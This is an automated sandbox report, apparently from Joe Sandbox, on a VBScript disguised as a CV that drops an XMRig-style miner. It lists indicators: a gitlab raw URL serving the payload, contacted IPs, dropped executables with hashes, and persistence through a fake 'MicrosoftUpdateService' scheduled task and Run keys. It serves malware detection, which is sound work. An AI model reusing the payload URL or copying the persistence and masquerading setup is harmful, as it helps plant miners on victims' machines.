                                              https://gitlab.com/-/sandbox/wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://gitlab.com/admin/wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://gitlab.com/assets/wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://customers.gitlab.comwscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envwscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://gitlab.com/-/speedscope/index.htmlwscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://gitlab.com/7wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/recaptcha/wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://xmrig.com/docs/algorithms7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.13.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://sourcegraph.comwscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usbwscript.exe, 00000019.00000002.754508592.0000025057FED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://apis.google.comwscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false-48AA-1wscript.exe, 00000019.00000003.753938394.0000025057FD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.754010637.0000025057FE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.753878427.0000025057FD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.nirsoft.net/7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drfalse
                                                                      		high
                                                                      https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false-48AA-1&&Twscript.exe, 00000019.00000003.754146201.0000025057FE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.754508592.0000025057FED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.754250011.0000025057FEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.micro6wscript.exe, 00000005.00000003.678726662.000002527022E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.7-zip.org/wscript.exe, 00000005.00000002.727305157.000002526E1B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://sentry.gitlab.netwscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.7-zip.org/a/7zr.exeSwscript.exe, 00000005.00000002.728510558.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.000002527019F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678726662.000002527019C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.000002527019F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.recaptcha.net/wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            172.65.251.78
                                                                            		gitlab.comUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            49.12.202.237
                                                                            		www.7-zip.orgGermany
                                                                            		24940HETZNER-ASDEfalse
                                                                            141.94.96.144
                                                                            		unknownGermany
                                                                            		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

                                                                            General Information

                                                                            Joe Sandbox Version:38.0.0 Beryl
                                                                            Analysis ID:1285225
                                                                            Start date and time:2023-08-03 17:56:21 +02:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 13m 45s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:29
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample file name:curriculum_vitae-copie_(1).vbs
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.mine.winVBS@32/17@2/3
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HDC Information:
                                                                            • Successful, ratio: 17.8% (good quality ratio 17.7%)
                                                                            • Quality average: 85%
                                                                            • Quality standard deviation: 17.6%
                                                                            HCA Information:
                                                                            • Successful, ratio: 98%
                                                                            • Number of executed functions: 102
                                                                            • Number of non-executed functions: 65
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .vbs
                                                                            • Override analysis time to 240s for JS/VBS files not yet terminated

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            17:57:25API Interceptor43x Sleep call for process: powershell.exe modified
                                                                            18:00:19Task SchedulerRun new task: MicrosoftUpdateService path: wscript.exe s>C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
                                                                            18:00:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
                                                                            18:00:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media Service wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                            • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            gitlab.comhttps://gitlab.com/ezsyfitlo/docs/-/raw/main/transaction_details_7f03a8029c0e4d95667aceb9cccab7c5.zipGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            KFCV2ASugW.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            KFCV2ASugW.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                                            • 172.65.251.78
                                                                            CrashHandler2.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            curriculum_vitae-copie.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            curriculum_vitae-copie.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            61242Pp10w.exeGet hashmaliciousDCRat, RedLine, SmokeLoaderBrowse
                                                                            • 172.65.251.78
                                                                            p4pEBxCplv.exeGet hashmaliciousDCRat, RedLine, SmokeLoaderBrowse
                                                                            • 172.65.251.78
                                                                            JC4Fer2SNi.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                            • 172.65.251.78
                                                                            rain.exeGet hashmaliciousAsyncRATBrowse
                                                                            • 172.65.251.78
                                                                            Blender 2.93.0 Crack Key 3D (Torrent) Free Download Downloader.exeGet hashmaliciousRedLineBrowse
                                                                            • 172.65.251.78
                                                                            tmpBA2F.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            tmp3F72.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            tmp381D.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            tmpE473.vbsGet hashmaliciousUnknownBrowse
                                                                            • 172.65.251.78
                                                                            MultiHack Menu.exeGet hashmaliciousRedLineBrowse
                                                                            • 172.65.251.78
                                                                            ProtonVPN 2.4.31 Crack Full Working License Key Download Downloader.exeGet hashmaliciousRedLineBrowse
                                                                            • 172.65.251.78
                                                                            file.exeGet hashmaliciousAmadey, CryptOne, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                            • 172.65.251.78
                                                                            www.7-zip.orgINV-Details-Jul2023.pdf.jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            INV-Details-Jul2023.pdf.jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            Invoice_Details.jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            Invoice_Details.jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                                            • 49.12.202.237
                                                                            7z2201_setup.msiGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            .........vbsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUS23HQy354.posh.ps1Get hashmaliciousPowershell KeyloggerBrowse
                                                                            • 162.159.136.232
                                                                            https://frostylogs01.lt.emlnk.com/Prod/link-tracker?notrack=1&redirectUrl=aHR0cHMlM0ElMkYlMkZwdWItMTY0OTlkMzUyY2MxNGZlNGI4Y2RmMDY0YmIyMDU1NDcucjIuZGV2JTJGNG91dG1hbmFnZW1lbnRzZWN1cmUuaHRtbA==&sig=7HUYuHTuFa9RXcSn4qZDGDiUFh1Q7UGZwriFuJV1xqxb&iat=1691073910&a=%7C%7C478292917%7C%7C&account=frostylogs01%2Eactivehosted%2Ecom&email=yFh0A4%2FAowLLSbyayCErDfNx%2FwpdpGW0%2BJo1ko8IWGFqod7aLINVmXIHAKZe%3A%2BeM5jeIBnwdw1IUBdXJAfB5CGl1V7Wd5&s=ZXNoZXR1aEBldGhpb3BpYW5haXJsaW5lcy5jb20=&i=1A3A1A4#aW5xdWlyaWVzQGF0bGFzLWFwZXguY29tGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            GREENN_VALLEY_PO_REVISED_NO363846348.vbsGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.114.96.7
                                                                            ATT00001.htmGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            http://bishoparts.com/community/bishop-flats/?utm_source=google&utm_medium=google-my-businessGet hashmaliciousUnknownBrowse
                                                                            • 172.67.151.91
                                                                            http://bishoparts.com/community/bishop-flats/Get hashmaliciousUnknownBrowse
                                                                            • 104.21.82.23
                                                                            SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.22204.16645.rtfGet hashmaliciousFormBookBrowse
                                                                            • 104.21.76.107
                                                                            http://www.nnov.org/common/link.php?redir=http://linkedin.com+accounts%3Dsecurelogin+settings%3Dprivate@DOMs.biqscore.com/r/?userid=bGVlLmdpYnNvbkBzb3V0aHNpZGUuY29tGet hashmaliciousUnknownBrowse
                                                                            • 104.16.123.96
                                                                            http://l.h4.hilton.com/rts/go2.aspx?h=1993652&tp=i-16D9-Ak-Dd7-C0Cn1s-24-urf45-1c-l80th8gw79-WSYPS&x=treelite.com%2F%2F%2FbmFicm9va3NAbXljd3QuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.21.73.13
                                                                            https://wlatoday.co/install.phpGet hashmaliciousTechSupportScamBrowse
                                                                            • 104.17.24.14
                                                                            email (2).emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 1.1.1.1
                                                                            https://r20.rs6.net/tn.jsp?f=001gQRE76jBwFQJEbkYIK_N_JRD115GoiQ_5nMLuQNedCeycyxeVZ36IcLNI2_xt4538mVfkhSbKp5bDYhuQ7_0mR6u-DaBr1s9x-e_RcJns7xKj5XklHU-lWS_b8zQa5k6aODIP8VT6zCfpuzB5Mxzuw==&c=0yINqpVMKS1zwsS-Act_qYSOppesg06_pN8dusfJ_OY3n-88rG_Kmw==&ch=j3Jf2PBW-Zkj6VnuQiE5SeQ4p4x5TLRviLEaCF8F5ESkdtTTa_TxLQ==&__=?TOI=ZWt0YS5zaW5naEBhZ3NoZWFsdGguY29tGet hashmaliciousUnknownBrowse
                                                                            • 104.18.16.182
                                                                            http://docs.google.com/presentation/d/e/2PACX-1vSY3luxWCQQtw8_ykeu-T_rjQiRNnCXArLykiEwFk8wuDxHBv44DQjpfl5luXvbVgHH_aSaDguNVJH5/pubGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.24.14
                                                                            http://googleweblight.com/i?u=https://lemon-icy-experience.glitch.me/#rp@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            https://track.tec80.com/action-tracking/click?identifier=NmI1ZTk1YjUtMDE2ZS00OWM4LTg2ZWQtYWZlODc2MjAzYzY5X18yX19mZg==&redirectUrl=https%3A%2F%2Fkhe.soundestlink.com%2Flink%2F64cb5c271a22782f01f0e313%2F64cb5c0c92997e0ed3774042%2F64cb5b24038c498ecd8f7262%3Fsignature%3D4136e0f40f456a9b63ed723b39b0ad83f0895db435d44c84b5490d9035243e1b%23vblake%40liberty-bank.comGet hashmaliciousUnknownBrowse
                                                                            • 104.18.31.243
                                                                            https://khe.soundestlink.com/link/64cb5c271a22782f01f0e313/64cb5c0c92997e0ed3774042/64cb5b24038c498ecd8f7262?signature=4136e0f40f456a9b63ed723b39b0ad83f0895db435d44c84b5490d9035243e1b#vblake@liberty-bank.comGet hashmaliciousUnknownBrowse
                                                                            • 104.18.30.243
                                                                            https://indd.adobe.com/view/94d7255b-7c39-4bd8-a6a7-b7cfc20fa570Get hashmaliciousHTMLPhisherBrowse
                                                                            • 104.17.25.14
                                                                            http://analytic.13net.xyzGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.7
                                                                            Products.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                            • 188.114.96.7
                                                                            https://gitlab.formuleets.ca/users/sign_inGet hashmaliciousUnknownBrowse
                                                                            • 104.18.5.176

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            37f463bf4616ecd445d4a1937da06e19bVUwkiKbXs.dllGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            bVUwkiKbXs.dllGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx.docGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Details_for_booking.docx.docGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            vfKkwM2QFU.exeGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Justificante_Pago_es_01082023211570182_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Unconfirmed 69219.exeGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            New_Order_Inquiry.docx.docGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            2308_20230802_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            RFQ_from_ITP_Aero_-_202308_Rev._140502231#U00b7pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            QoE81ExCsv.exeGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Vk4Ddt2Qew.exeGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            HALKBANK.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            RE_INV.NO.1423200071_DECOSTER.vbsGet hashmaliciousFormBookBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Chrome_update(1).jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Browser_update16.0.5836.jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Chrome_update(1).jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78
                                                                            TcXNGdMcM3.dllGet hashmaliciousUnknownBrowse
                                                                            • 49.12.202.237
                                                                            • 172.65.251.78

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\Public\WindowsUpdate\WinRing0x64.sysz0F3IqClsI.exeGet hashmaliciousXmrigBrowse
                                                                              vneROOOdoO.exeGet hashmaliciousMinerDownloader, XmrigBrowse
                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                  UY7ZeZU4J1.exeGet hashmaliciousXmrigBrowse
                                                                                    Setup.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                                                                      ES35Rg6cR3.exeGet hashmaliciousXmrigBrowse
                                                                                        a3aqW6c2mH.exeGet hashmaliciousXmrigBrowse
                                                                                          QRhsq2hGuk.exeGet hashmaliciousDCRat, RedLine, XmrigBrowse
                                                                                            juMljBJTV4.exeGet hashmaliciousAmadey, Fabookie, XmrigBrowse
                                                                                              4JWAXMCvgX.exeGet hashmaliciousXmrigBrowse
                                                                                                vCNJHXcaOr.exeGet hashmaliciousMinerDownloader, XmrigBrowse
                                                                                                  SecuriteInfo.com.Variant.Barys.382682.19571.14086.exeGet hashmaliciousXmrigBrowse
                                                                                                    7fYLxsZoUl.exeGet hashmaliciousXmrigBrowse
                                                                                                      aRrsrJlxxi.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                        Epq6NI7LxO.exeGet hashmaliciousMinerDownloader, XmrigBrowse
                                                                                                          z63TGLD4HC.exeGet hashmaliciousXmrigBrowse
                                                                                                            file.exeGet hashmaliciousRemcos, XmrigBrowse
                                                                                                              dsf.exeGet hashmaliciousXmrigBrowse
                                                                                                                a4jPUtgauO.exeGet hashmaliciousXmrigBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\Public\7g.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):584704
                                                                                                                  Entropy (8bit):6.634685254929279
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:FSjMK6lrdOCdlki5Zc0EyR35ksye/X16PJz5tghj+:FSjieCd+i5s+Jks1foxz5Whj+
                                                                                                                  MD5:58FC6DE6C4E5D2FDA63565D54FEB9E75
                                                                                                                  SHA1:0586248C327D21EFB8787E8EA9F553DDC03493EC
                                                                                                                  SHA-256:72C98287B2E8F85EA7BB87834B6CE1CE7CE7F41A8C97A81B307D4D4BF900922B
                                                                                                                  SHA-512:E7373A9CAA023A22CC1F0F4369C2089A939AE40D26999AB5DCAB2C5FEB427DC9F51F96D91EF078E843301BAA5D9335161A2CF015E09E678D56E615D01C8196DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Aes.............~.......j...............j.......j.........B...............@.....3".......{......3"...............v..............Rich............................PE..L....\.d.................t..........F.............@.......................................@.................................$...x.... .......................0...L......................................................4............................text...Ur.......t.................. ..`.rdata...............x..............@..@.data....j..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...V...0...X..................@..B................................................................................................................................................................................................................................

                                                                                                                  C:\Users\Public\WindowsUpdate\Update.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2794
                                                                                                                  Entropy (8bit):3.549190186621027
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:yei1q9tRQSRiMyVwTvara+iaiudupRCRf9ufAuRa7T5XHPsV8i59rQt+++:ttRdRi1WGdiaigV9ll7dHFSQ+
                                                                                                                  MD5:21D6C92F3AA287A7BAE667DC3618909E
                                                                                                                  SHA1:E09887D505C41E205ADCDFC79A3203BFA9D735B2
                                                                                                                  SHA-256:90EA3B7C2B00D4BD10E180777FFDAEA8037DA06208906DBE923AD7207F95C59F
                                                                                                                  SHA-512:907E24370DDE2DDECA4007FA563241280571AED2640C367645C859AA375431A88605CA18A775B3B346436C5DB9E9DD53A7D4D8E8E6EAE95DC0605B13BC721171
                                                                                                                  Malicious:true
                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.T.i.m.e.T.r.i.g.g.e.r.>..... . . . . . .<.R.e.p.e.t.i.t.i.o.n.>..... . . . . . . . .<.I.n.t.e.r.v.a.l.>.P.T.1.0.M.<./.I.n.t.e.r.v.a.l.>..... . . . . . . . .<.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>.f.a.l.s.e.<./.S.t.o.p.A.t.D.u.r.a.t.i.o.n.E.n.d.>..... . . . . . .<./.R.e.p.e.t.i.t.i.o.n.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.3.-.0.2.-.0.5.T.1.4.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.T.i.m.e.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.S.e.t.t.i.n.g.s.>..... . . . .<.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>.I.g.n.o.r.e.N.e.w.<./.M.u.l.t.i.p.l.e.I.n.s.t.a.n.c.e.s.P.o.l.i.c.y.>..... . . . .<.D.

                                                                                                                  C:\Users\Public\WindowsUpdate\WinRing0x64.sys

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14544
                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: z0F3IqClsI.exe, Detection: malicious, Browse
                                                                                                                  • Filename: vneROOOdoO.exe, Detection: malicious, Browse
                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                  • Filename: UY7ZeZU4J1.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ES35Rg6cR3.exe, Detection: malicious, Browse
                                                                                                                  • Filename: a3aqW6c2mH.exe, Detection: malicious, Browse
                                                                                                                  • Filename: QRhsq2hGuk.exe, Detection: malicious, Browse
                                                                                                                  • Filename: juMljBJTV4.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 4JWAXMCvgX.exe, Detection: malicious, Browse
                                                                                                                  • Filename: vCNJHXcaOr.exe, Detection: malicious, Browse
                                                                                                                  • Filename: SecuriteInfo.com.Variant.Barys.382682.19571.14086.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 7fYLxsZoUl.exe, Detection: malicious, Browse
                                                                                                                  • Filename: aRrsrJlxxi.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Epq6NI7LxO.exe, Detection: malicious, Browse
                                                                                                                  • Filename: z63TGLD4HC.exe, Detection: malicious, Browse
                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                  • Filename: dsf.exe, Detection: malicious, Browse
                                                                                                                  • Filename: a4jPUtgauO.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\Public\WindowsUpdate\go.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\7g.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):226816
                                                                                                                  Entropy (8bit):7.8690577923377445
